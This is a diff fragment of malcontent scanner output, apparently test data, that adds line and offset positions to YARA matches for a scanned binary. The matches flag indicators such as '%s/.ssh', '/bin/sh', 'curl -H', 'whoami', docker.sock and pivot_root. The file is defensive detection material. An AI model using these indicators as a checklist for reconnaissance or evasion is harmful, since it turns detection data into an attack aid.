                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs",
@@ -640,6 +799,10 @@
                     "MatchStrings": [
                         "MAC address"
                     ],
+                    "StartingLine": 18666,
+                    "EndingLine": 18666,
+                    "StartingOffset": 350,
+                    "EndingOffset": 360,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr",
@@ -651,6 +814,10 @@
                     "MatchStrings": [
                         "netstat"
                     ],
+                    "StartingLine": 18620,
+                    "EndingLine": 18620,
+                    "StartingOffset": 197,
+                    "EndingOffset": 203,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat",
@@ -662,6 +829,10 @@
                     "MatchStrings": [
                         "Getegid"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 27072,
+                    "StartingOffset": 91336,
+                    "EndingOffset": 91342,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/egid.yara#getegid",
@@ -673,6 +844,10 @@
                     "MatchStrings": [
                         "Geteuid"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 27072,
+                    "StartingOffset": 91305,
+                    "EndingOffset": 91311,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/euid.yara#geteuid",
@@ -684,6 +859,10 @@
                     "MatchStrings": [
                         "getpid"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 63413,
+                    "EndingOffset": 60316,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/pid.yara#getpid",
@@ -696,6 +875,10 @@
                         "getrlimit",
                         "Getrlimit"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 92053,
+                    "EndingOffset": 85929,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/resource-limits.yara#getrlimit",
@@ -707,6 +890,10 @@
                     "MatchStrings": [
                         "Getuid"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 27072,
+                    "StartingOffset": 91321,
+                    "EndingOffset": 126347,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/uid.yara#getuid",
@@ -719,6 +906,10 @@
                         "getwd",
                         "Getwd"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 91398,
+                    "EndingOffset": 98127,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/working_directory.yara#getwd",
@@ -730,6 +921,10 @@
                     "MatchStrings": [
                         "pgrep"
                     ],
+                    "StartingLine": 18628,
+                    "EndingLine": 18628,
+                    "StartingOffset": 807,
+                    "EndingOffset": 811,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/processes/pgrep.yara#pgrep",
@@ -741,6 +936,10 @@
                     "MatchStrings": [
                         "nproc"
                     ],
+                    "StartingLine": 18621,
+                    "EndingLine": 18707,
+                    "StartingOffset": 1994,
+                    "EndingOffset": 4383,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu.yara#processor_count",
@@ -753,6 +952,10 @@
                     "MatchStrings": [
                         "dmesg"
                     ],
+                    "StartingLine": 18603,
+                    "EndingLine": 18603,
+                    "StartingOffset": 315,
+                    "EndingOffset": 319,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/dmesg.yara#dmesg",
@@ -764,6 +967,10 @@
                     "MatchStrings": [
                         "/proc/sys/kernel/hostname"
                     ],
+                    "StartingLine": 18694,
+                    "EndingLine": 18694,
+                    "StartingOffset": 3415,
+                    "EndingOffset": 3439,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname",
@@ -777,6 +984,10 @@
                         "syscall.Uname",
                         "uname"
                     ],
+                    "StartingLine": 18603,
+                    "EndingLine": 119414,
+                    "StartingOffset": 455,
+                    "EndingOffset": 85803,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname",
@@ -790,6 +1001,9 @@
                         "getenv",
                         "HOME"
                     ],
+                    "StartingLine": 18629,
+                    "EndingLine": 119414,
+                    "EndingOffset": 31459,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME",
@@ -804,6 +1018,10 @@
                         "getenv",
                         "USER"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 4063,
+                    "EndingOffset": 528830,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER",
@@ -816,6 +1034,10 @@
                     "MatchStrings": [
                         "user/lookup"
                     ],
+                    "StartingLine": 27092,
+                    "EndingLine": 27092,
+                    "StartingOffset": 15464,
+                    "EndingOffset": 15516,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/lookup.yara#getpwuid",
@@ -827,6 +1049,10 @@
                     "MatchStrings": [
                         "whoami"
                     ],
+                    "StartingLine": 18640,
+                    "EndingLine": 18640,
+                    "StartingOffset": 564,
+                    "EndingOffset": 569,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami",
@@ -839,6 +1065,10 @@
                     "MatchStrings": [
                         "%s/.ssh"
                     ],
+                    "StartingLine": 18657,
+                    "EndingLine": 18657,
+                    "StartingOffset": 238,
+                    "EndingOffset": 244,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path",
@@ -851,6 +1081,10 @@
                     "MatchStrings": [
                         "pivot_root"
                     ],
+                    "StartingLine": 18648,
+                    "EndingLine": 18648,
+                    "StartingOffset": 54,
+                    "EndingOffset": 63,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hide_artifacts/pivot_root.yara#pivot_root",
@@ -863,6 +1097,10 @@
                         "CombinedOutput",
                         "exec"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 1852,
+                    "EndingOffset": 1185989,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen_go",
@@ -926,6 +1164,10 @@
                         "PluginEnv",
                         "sovPlugin"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 6736,
+                    "EndingOffset": 1249555,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin",
@@ -938,6 +1180,10 @@
                         ").CombinedOutput",
                         "exec.(*Cmd).Run"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 620132,
+                    "EndingOffset": 592880,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run",
@@ -951,6 +1197,10 @@
                         "nohup",
                         "#!"
                     ],
+                    "StartingLine": 167,
+                    "EndingLine": 119406,
+                    "StartingOffset": 671,
+                    "EndingOffset": 423,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/background-sleep.yara#sleep_and_background",
@@ -963,6 +1213,10 @@
                         "/bin/bash",
                         "/bin/sh"
                     ],
+                    "StartingLine": 18575,
+                    "EndingLine": 18659,
+                    "StartingOffset": 217,
+                    "EndingOffset": 316,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell",
@@ -974,6 +1228,10 @@
                     "MatchStrings": [
                         "blkid"
                     ],
+                    "StartingLine": 18612,
+                    "EndingLine": 18612,
+                    "StartingOffset": 1344,
+                    "EndingOffset": 1348,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/blkid.yara#blkid",
@@ -986,6 +1244,10 @@
                     "MatchStrings": [
                         "ioctl"
                     ],
+                    "StartingLine": 18724,
+                    "EndingLine": 27092,
+                    "StartingOffset": 104,
+                    "EndingOffset": 53985,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/device-control.yara#ioctl",
@@ -997,6 +1259,10 @@
                     "MatchStrings": [
                         "mkdir"
                     ],
+                    "StartingLine": 13040,
+                    "EndingLine": 18603,
+                    "StartingOffset": 57466,
+                    "EndingOffset": 379,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir",
@@ -1009,6 +1275,10 @@
                     "MatchStrings": [
                         ".ReadDir"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 105650,
+                    "EndingOffset": 1010121,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir",
@@ -1021,6 +1291,10 @@
                         "rmdir",
                         "Rmdir"
                     ],
+                    "StartingLine": 18603,
+                    "EndingLine": 27072,
+                    "StartingOffset": 425,
+                    "EndingOffset": 108093,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir",
@@ -1032,6 +1306,10 @@
                     "MatchStrings": [
                         "mkfifo"
                     ],
+                    "StartingLine": 18640,
+                    "EndingLine": 18640,
+                    "StartingOffset": 279,
+                    "EndingOffset": 284,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/fifo-create.yara#mkfifo",
@@ -1043,6 +1321,10 @@
                     "MatchStrings": [
                         "faccessat2"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 92543,
+                    "EndingOffset": 85454,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-access-check.yara#_access",
@@ -1054,6 +1336,10 @@
                     "MatchStrings": [
                         "unlinkat"
                     ],
+                    "StartingLine": 13040,
+                    "EndingLine": 119414,
+                    "StartingOffset": 63127,
+                    "EndingOffset": 85569,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink",
@@ -1066,6 +1352,10 @@
                     "MatchStrings": [
                         "rm non-TreeNodersopenpgp"
                     ],
+                    "StartingLine": 18731,
+                    "EndingLine": 18731,
+                    "StartingOffset": 543,
+                    "EndingOffset": 566,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_force",
@@ -1077,6 +1367,10 @@
                     "MatchStrings": [
                         "openFile"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 10216,
+                    "EndingOffset": 1044685,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#java_open",
@@ -1089,6 +1383,10 @@
                         "os.(*File).Read",
                         "ReadFile"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 9026,
+                    "EndingOffset": 1009917,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read",
@@ -1101,6 +1399,10 @@
                         "os.rename",
                         "os.Rename"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 107829,
+                    "EndingOffset": 97861,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-rename.yara#explicit_rename",
@@ -1112,6 +1414,10 @@
                     "MatchStrings": [
                         "_stat"
                     ],
+                    "StartingLine": 14084,
+                    "EndingLine": 119414,
+                    "StartingOffset": 2923,
+                    "EndingOffset": 377783,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-stat.yara#stat",
@@ -1124,6 +1430,10 @@
                         "syscall.Fsync",
                         "fsync"
                     ],
+                    "StartingLine": 18603,
+                    "EndingLine": 119414,
+                    "StartingOffset": 355,
+                    "EndingOffset": 85713,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-sync.yara#fsync",
@@ -1136,6 +1446,10 @@
                     "MatchStrings": [
                         "truncate"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 8866,
+                    "EndingOffset": 100714,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#truncate",
@@ -1152,6 +1466,10 @@
                         "writeOneFile",
                         "WriteFile"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 18740,
+                    "EndingOffset": 1010021,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write",
@@ -1163,6 +1481,10 @@
                     "MatchStrings": [
                         "linkat"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 92614,
+                    "EndingOffset": 85486,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-create.yara#linkat",
@@ -1174,6 +1496,10 @@
                     "MatchStrings": [
                         "readlinkat"
                     ],
+                    "StartingLine": 18651,
+                    "EndingLine": 119414,
+                    "StartingOffset": 1802,
+                    "EndingOffset": 85534,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink",
@@ -1186,6 +1512,10 @@
                     "MatchStrings": [
                         "flock"
                     ],
+                    "StartingLine": 18628,
+                    "EndingLine": 18628,
+                    "StartingOffset": 667,
+                    "EndingOffset": 671,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock",
@@ -1198,6 +1528,10 @@
                         "mount",
                         "-o"
                     ],
+                    "StartingLine": 9506,
+                    "EndingLine": 119414,
+                    "StartingOffset": 13,
+                    "EndingOffset": 890603,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount",
@@ -1209,6 +1543,10 @@
                     "MatchStrings": [
                         "mknod"
                     ],
+                    "StartingLine": 18603,
+                    "EndingLine": 18603,
+                    "StartingOffset": 385,
+                    "EndingOffset": 389,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod",
@@ -1221,6 +1559,10 @@
                     "MatchStrings": [
                         "/bin/su"
                     ],
+                    "StartingLine": 18575,
+                    "EndingLine": 18620,
+                    "StartingOffset": 308,
+                    "EndingOffset": 586,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/bin-su.yara#bin_su",
@@ -1232,6 +1574,10 @@
                     "MatchStrings": [
                         "/dev/null"
                     ],
+                    "StartingLine": 18592,
+                    "EndingLine": 20663,
+                    "StartingOffset": 432,
+                    "EndingOffset": 40,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/dev-null.yara#dev_null",
@@ -1271,6 +1617,10 @@
                         "/etc/group",
                         "/etc/bash"
                     ],
+                    "StartingLine": 18584,
+                    "EndingLine": 18942,
+                    "StartingOffset": 520,
+                    "EndingOffset": 49,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path",
@@ -1282,6 +1632,10 @@
                     "MatchStrings": [
                         "/etc/hosts"
                     ],
+                    "StartingLine": 18605,
+                    "EndingLine": 18605,
+                    "StartingOffset": 140,
+                    "EndingOffset": 149,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-hosts.yara#etc_hosts",
@@ -1293,6 +1647,10 @@
                     "MatchStrings": [
                         "/etc/resolv.conf"
                     ],
+                    "StartingLine": 18650,
+                    "EndingLine": 18650,
+                    "StartingOffset": 256,
+                    "EndingOffset": 271,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-resolv.conf.yara#etc_resolv_conf",
@@ -1304,6 +1662,10 @@
                     "MatchStrings": [
                         "/home/sha2561.32.11.33.01.33.11.33.21.34.01.34.11.35.01.36.0ID"
                     ],
+                    "StartingLine": 18565,
+                    "EndingLine": 18565,
+                    "StartingOffset": 78,
+                    "EndingOffset": 139,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path",
@@ -1315,6 +1677,10 @@
                     "MatchStrings": [
                         "~/.config/fish/completions/"
                     ],
+                    "StartingLine": 18893,
+                    "EndingLine": 18893,
+                    "StartingOffset": 25,
+                    "EndingOffset": 51,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home-config.yara#home_config_path",
@@ -1327,6 +1693,10 @@
                         "./pipe",
                         "./line"
                     ],
+                    "StartingLine": 18710,
+                    "EndingLine": 18757,
+                    "StartingOffset": 2761,
+                    "EndingOffset": 5585,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val",
@@ -1338,6 +1708,10 @@
                     "MatchStrings": [
                         "/root/linuxrc/sbin/hwclock/sbin/ipneigh/sbin/iproute/sbin/logread/sbin"
                     ],
+                    "StartingLine": 18623,
+                    "EndingLine": 18623,
+                    "StartingOffset": 91,
+                    "EndingOffset": 160,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/root.yara#root_path_val",
@@ -1517,6 +1891,10 @@
                         "/usr/bin/dc",
                         "/usr/bin/bc"
                     ],
+                    "StartingLine": 18603,
+                    "EndingLine": 18669,
+                    "StartingOffset": 530,
+                    "EndingOffset": 159,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-bin.yara#usr_bin_path",
@@ -1528,6 +1906,10 @@
                     "MatchStrings": [
                         "/usr/local/bin"
                     ],
+                    "StartingLine": 18780,
+                    "EndingLine": 18780,
+                    "StartingOffset": 1731,
+                    "EndingOffset": 1744,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-local.yara#usr_local_bin_path",
@@ -1592,6 +1974,10 @@
                         "/usr/sbin/remove-shell/usr/sbin/ubiupdatevolgenerating",
                         "/usr/sbin/lpd/usr/sbin/mim/usr/bin/tree"
                     ],
+                    "StartingLine": 18623,
+                    "EndingLine": 18693,
+                    "StartingOffset": 663,
+                    "EndingOffset": 151,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-sbin.yara#usr_sbin_path",
@@ -1607,6 +1993,10 @@
                         "/var/run/docker.sockopen",
                         "/var/cache%s"
                     ],
+                    "StartingLine": 18605,
+                    "EndingLine": 18710,
+                    "StartingOffset": 220,
+                    "EndingOffset": 2757,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path",
@@ -1618,6 +2008,10 @@
                     "MatchStrings": [
                         "Chown"
                     ],
+                    "StartingLine": 13040,
+                    "EndingLine": 119414,
+                    "StartingOffset": 56689,
+                    "EndingOffset": 1010465,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#Chown",
@@ -1630,6 +2024,10 @@
                         "chmod",
                         "Chmod"
                     ],
+                    "StartingLine": 13040,
+                    "EndingLine": 119414,
+                    "StartingOffset": 56682,
+                    "EndingOffset": 1010420,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod",
@@ -1642,6 +2040,10 @@
                     "MatchStrings": [
                         "swapoff"
                     ],
+                    "StartingLine": 18623,
+                    "EndingLine": 18623,
+                    "StartingOffset": 214,
+                    "EndingOffset": 220,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/swap/swap-off.yara#swapoff",
@@ -1653,6 +2055,10 @@
                     "MatchStrings": [
                         "swapon"
                     ],
+                    "StartingLine": 18620,
+                    "EndingLine": 18620,
+                    "StartingOffset": 414,
+                    "EndingOffset": 419,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/swap/swap-on.yara#swapon",
@@ -1664,6 +2070,10 @@
                     "MatchStrings": [
                         "symlink"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 27092,
+                    "StartingOffset": 8212,
+                    "EndingOffset": 15400,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-create.yara#symlink",
@@ -1675,6 +2085,10 @@
                     "MatchStrings": [
                         "realpath"
                     ],
+                    "StartingLine": 18651,
+                    "EndingLine": 18651,
+                    "StartingOffset": 1819,
+                    "EndingOffset": 1826,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath",
@@ -1688,6 +2102,10 @@
                         "getenv",
                         "temp"
                     ],
+                    "StartingLine": 18613,
+                    "EndingLine": 119414,
+                    "StartingOffset": 577,
+                    "EndingOffset": 31459,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TEMP.yara#temp",
@@ -1701,6 +2119,10 @@
                         "tmpfile",
                         "mktemp"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 18777,
+                    "StartingOffset": 5548,
+                    "EndingOffset": 1284,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile.yara#mktemp",
@@ -1712,6 +2134,10 @@
                     "MatchStrings": [
                         "umount"
                     ],
+                    "StartingLine": 18612,
+                    "EndingLine": 18612,
+                    "StartingOffset": 1310,
+                    "EndingOffset": 1315,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/unmount.yara#umount",
@@ -1723,6 +2149,10 @@
                     "MatchStrings": [
                         "/dev/urandom"
                     ],
+                    "StartingLine": 87134,
+                    "EndingLine": 87134,
+                    "StartingOffset": 21,
+                    "EndingOffset": 32,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/urandom.yara#urandom",
@@ -1735,6 +2165,10 @@
                         "HeartbeatPeriod",
                         "HeartbeatTick"
                     ],
+                    "StartingLine": 14049,
+                    "EndingLine": 14125,
+                    "StartingOffset": 34040,
+                    "EndingOffset": 6356,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat",
@@ -1746,6 +2180,10 @@
                     "MatchStrings": [
                         "getopt"
                     ],
+                    "StartingLine": 18612,
+                    "EndingLine": 18612,
+                    "StartingOffset": 1200,
+                    "EndingOffset": 1205,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ui/parses-arguments.yara#argparse",
@@ -1757,6 +2195,10 @@
                     "MatchStrings": [
                         "madvise"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 63754,
+                    "EndingOffset": 60748,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/advise.yara#madvise",
@@ -1770,6 +2212,10 @@
                         "dnsmessage",
                         "SetEDNS0"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 13736,
+                    "EndingOffset": 1213314,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs",
@@ -1782,6 +2228,9 @@
                         ".in-addr.arpa",
                         "ip6.arpa"
                     ],
+                    "StartingLine": 18593,
+                    "EndingLine": 18633,
+                    "EndingOffset": 12,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa",
@@ -1793,6 +2242,10 @@
                     "MatchStrings": [
                         "CNAMEResource"
                     ],
+                    "StartingLine": 14049,
+                    "EndingLine": 119414,
+                    "StartingOffset": 30260,
+                    "EndingOffset": 202853,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local",
@@ -1805,6 +2258,10 @@
                         "dns",
                         "TXT"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 20220,
+                    "EndingOffset": 1213307,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt",
@@ -1818,6 +2275,10 @@
                         "downloadLocation",
                         "DownloadLocation"
                     ],
+                    "StartingLine": 14147,
+                    "EndingLine": 18745,
+                    "StartingOffset": 6595,
+                    "EndingOffset": 3404,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download",
@@ -1829,6 +2290,10 @@
                     "MatchStrings": [
                         "curl -H \""
                     ],
+                    "StartingLine": 18853,
+                    "EndingLine": 18856,
+                    "StartingOffset": 2,
+                    "EndingOffset": 10,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value",
@@ -1841,6 +2306,10 @@
                         "http",
                         "HTTP"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 3821,
+                    "EndingOffset": 1247294,
                     "RiskScore": 1,
